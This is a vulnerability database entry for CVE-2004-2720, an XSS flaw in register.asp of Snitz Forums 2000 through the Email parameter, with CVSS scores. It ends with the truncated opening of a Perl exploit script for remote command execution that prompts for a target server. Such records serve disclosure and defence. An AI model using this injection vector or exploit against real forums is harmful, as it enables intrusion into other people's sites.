4.3
CVSSv2

CVE-2004-2720

Published: 31/12/2004 Updated: 29/07/2017
CVSS v2 Base Score: 4.3 | Impact Score: 2.9 | Exploitability Score: 8.6
VMScore: 435
Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N

Vulnerability Summary

Cross-site scripting (XSS) vulnerability in register.asp in Snitz Forums 2000 3.4.04 and previous versions allows remote malicious users to inject arbitrary web script or HTML via javascript events in the Email parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

snitz communications snitz forums 2000

Exploits

#!/usr/bin/perl use Socket; print "\nRemote command execution against Snitz Forums 3303 (and probably others)\n"; print "You accept full responsibility for your actions by using this script\n"; print "INTERNAL USE ONLY!! DO NOT DISTRIBUTE!!\n"; print "\nWeb server? [wwwenterthegamecom]: "; my $webserver = <STDIN>; chomp $webserver; i ...